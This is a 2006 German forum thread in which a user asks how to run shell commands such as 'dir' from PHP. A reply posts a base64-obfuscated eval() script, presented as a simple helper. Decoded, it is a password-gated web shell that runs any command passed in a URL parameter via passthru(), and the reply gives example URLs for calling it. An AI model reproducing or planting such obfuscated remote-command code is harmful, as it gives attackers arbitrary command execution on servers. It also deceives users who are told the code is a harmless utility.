CMD-cmds mit php

Dieses Thema im Forum "Webentwicklung" wurde erstellt von myth2806, 27. Juni 2006 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 27. Juni 2006
    Hi leutz

    also ich würde gerne mit hilfe von irgeneinem php-script den befehl "dir" auf einem unter windows laufendem apache-server laufen lassen. ich hoffe jemand hat da eine möglichkeit das zu verwirklichen :]

    thx schon mal im vorraus!

    greez myth
     

  2. Anzeige
  3. #2 28. Juni 2006
    hi du!

    hab mal ein script geschrieben mit welchem so etwas machen kannst! Hier mal zuerst der Source:

    Code:
    <?
    eval(str_replace('\\','',base64_decode("JGMgPSAkX1JFUVVFU1RbXCdjXCddOw0KJHAgPSAkX1JFUVVFU1RbXCdwXCddOw0KcHJpbnQgXCIkYyArICRwXCI7DQppZigkYyAmJiBtZDUoJHApPT0gXCdlYjM5OWJjYWNhNjg2Zjg2MDkxMzcxNTMzMDdlZWNmMVwnICkNCnsNCglwcmludCBcIiRjXCI7DQoJcGFzc3RocnUoJGMpOw0KCQ0KfQ0KZWxzZSANCnsNCglwaHBpbmZvKCk7DQp9")));
    ?>
    
    funktionsweise:

    php code in einer php file speichern z.b. test.php

    aufruf der datei dann bitte wie folgt:

    http://<ip>/test.php?p=change&c=<command>

    p=change muss drin sein weil ich ne passwort überprüfung drin hab - wenn p nicht change ist, zeigt es dir einen phpinfo file an...

    statt <command> kannst du dann entweder unix oder windows befehle angeben! z.b. für eine auflistung der dateien:

    unter unix: ls -latr
    unter windows: dir

    also z.b.: http://<ip>/test.php?p=change&c=dir

    hoffe ich konnte dir helfen!

    lg
    maui
     
  4. #3 28. Juni 2006
    thx dafür... hastd dir ja echt mühe gemacht bei der erklärung :p aber ich wollte nur
    den befehl "passthru" kennen... den hab ich ja jetzt :]

    thx

    greez myth

    //closed
     

  5. Videos zum Thema
Die Seite wird geladen...
Similar Threads - CMD cmds php
  1. Antworten:
    9
    Aufrufe:
    2.116
  2. Antworten:
    4
    Aufrufe:
    1.084
  3. Antworten:
    2
    Aufrufe:
    1.075
  4. Antworten:
    2
    Aufrufe:
    1.405
  5. Antworten:
    4
    Aufrufe:
    916